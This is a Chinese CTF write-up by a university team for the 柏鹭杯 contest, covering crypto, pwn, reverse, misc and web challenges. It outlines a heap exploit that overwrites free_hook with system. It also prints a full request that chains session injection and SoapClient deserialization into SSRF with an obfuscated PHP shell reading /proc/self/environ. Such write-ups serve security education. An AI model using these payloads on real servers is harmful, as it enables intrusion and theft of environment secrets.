柏鹭杯
[TOC]
河南大学-A1igNed战队
柏鹭杯16名
签到
访问地址发现跳转到主办方官网,抓包看跳转内容
可以看到跳转页面写有flag
crypto
试试大数据分解?
1 | 一看n挺小的,直接扔yafu分解,额,过了3600+秒分解出来了。。。。 |
pwn
note1
先把tcache填满,再释放一次,得到在unsorted bin中的chunk
再通过切割,填充前8个字节,show带出libc地址
flip()可以调转使用堆块的方向
而堆块的信息(size和指针)是存放在堆中的,并且堆块的信息存放时可以超出0x800的范围,在可申请堆块的范围。
反向申请几个堆块chunk,再反向
申请一个可以控制到堆块信息的堆块,把指针改成free_hook
修改free_hook为system
最后getshell
进去之后发现flag是可执行文件,./flag得到flag
1 | #!/usr/bin/env python3 |
reverse
baby_python
python逆向,解包一下发现被加密了。是pyinstall的加密。直接反编译那个密钥文件,然后得到密钥,然后去wiki找到脚本,
1 | from Crypto.Cipher import AES |
解密一下,得到pyc文件,反编译一下发现就是一个简单的矩阵乘法。
直接z3跑
1 | from z3 import * |
作为输入,得到flag
flag{ISEC-ca32ab6174689b5e366241ad58108c68}
go
ida7.6打开,发现有加密函数和解密函数,不过要输入参数,我尝试用文件名作为输入,得到然后再下面准备进入加密函数的时候,我patch成解密函数的地址,继续运行,直接得到解密文件。。
O*** JUNK AAAABBBBCCCCDDDD ***O
flag{ISEC-42115cad00f8c4a0495bffa97d2ca3a8}
O*** JUNK EEEEFFFFGGGGHHHH ***O
杂项
蜜雪冰城
条形码,但是被涂上了其他的颜色,于是写个脚本提取出来,画出完整的条形码
1 | from PIL import Image |
扫码得到密码,解压得到第二层,明显的零宽,然后在kali下查看能够发现200BCD、202ACD和FEFF被选中,解密后是乱码,于是想着导出至二进制文件,导出之后直接显示mp3.
打开mp3后发现是拨号音,于是用AU将mp3改成wav,再用DTMF解密得到密码399#9311233212
最后得到flag
flag{ISEC-45rd4r8f4rq6h5y8u2v1x4f5y9i5afde}
web
Ezphp
index:
1 |
|
flag.php
1 |
|
与bestphp's revenge
大体相同,注入session,反序列化soap进行SSRF打到flag.php
flag.php 对shell内容有要求,找一个shell:
1 |
|
借助session的打印,将命令执行的结果保存在session中,多次尝试找到/proc/self/environ
poc生成:
1 |
|
请求一:
1 | POST /index.php?f=session_start&name=|O%3A10%3A%22SoapClient%22%3A3%3A%7Bs%3A3%3A%22uri%22%3Bs%3A362%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%3F_%3D%24_SESSION%5B%22hahaha%22%5D%3D%60cat+%2Fproc%2Fself%2Fenviron%60%26i%3D%24__%3D%5B%5D%3B+%24_%3D%28%24__%3D%3D%24__%29%3B+%24__%3D%7E%28%E8%9E%8D%29%3B+%24___%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%8C%86%29%3B+%24___.%3D%24__%5B%24_%5D.%24__%5B%24_%5D%3B+%24__%3D%7E%28%E9%9A%8F%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%8D%83%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E8%8B%A6%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24____%3D%7E%28%7E%28_%29%29%3B+%24__%3D%7E%28%E5%B8%BF%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%BA%BF%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E7%AB%99%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24_%3D%24%24____%3B+%24___%28%24_%5B_%5D%29%3B%22%3Bs%3A8%3A%22location%22%3Bs%3A362%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%3F_%3D%24_SESSION%5B%22hahaha%22%5D%3D%60cat+%2Fproc%2Fself%2Fenviron%60%26i%3D%24__%3D%5B%5D%3B+%24_%3D%28%24__%3D%3D%24__%29%3B+%24__%3D%7E%28%E8%9E%8D%29%3B+%24___%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%8C%86%29%3B+%24___.%3D%24__%5B%24_%5D.%24__%5B%24_%5D%3B+%24__%3D%7E%28%E9%9A%8F%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%8D%83%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E8%8B%A6%29%3B+%24___.%3D%24__%5B%24_%5D%3B+%24____%3D%7E%28%7E%28_%29%29%3B+%24__%3D%7E%28%E5%B8%BF%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E5%BA%BF%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24__%3D%7E%28%E7%AB%99%29%3B+%24____.%3D%24__%5B%24_%5D%3B+%24_%3D%24%24____%3B+%24___%28%24_%5B_%5D%29%3B%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D HTTP/1.1 |
请求二:
1 | POST /index.php?f=extract HTTP/1.1 |
多次访问回显参数:
["PHPSESSID"]=>
array(3) {
[0]=>
string(26) "7imbbmbj5nbrpl150k0t4j1bm5"
[1]=>
string(1) "/"
[2]=>
string(9) "127.0.0.1"
}
请求三:
1 | GET /index.php HTTP/1.1 |
回显:
1 | array(1) { |
FLAG=flag{ISEC-c59691c19713573fa23f0876257cfd7c}
-------------本文结束感谢您的阅读-------------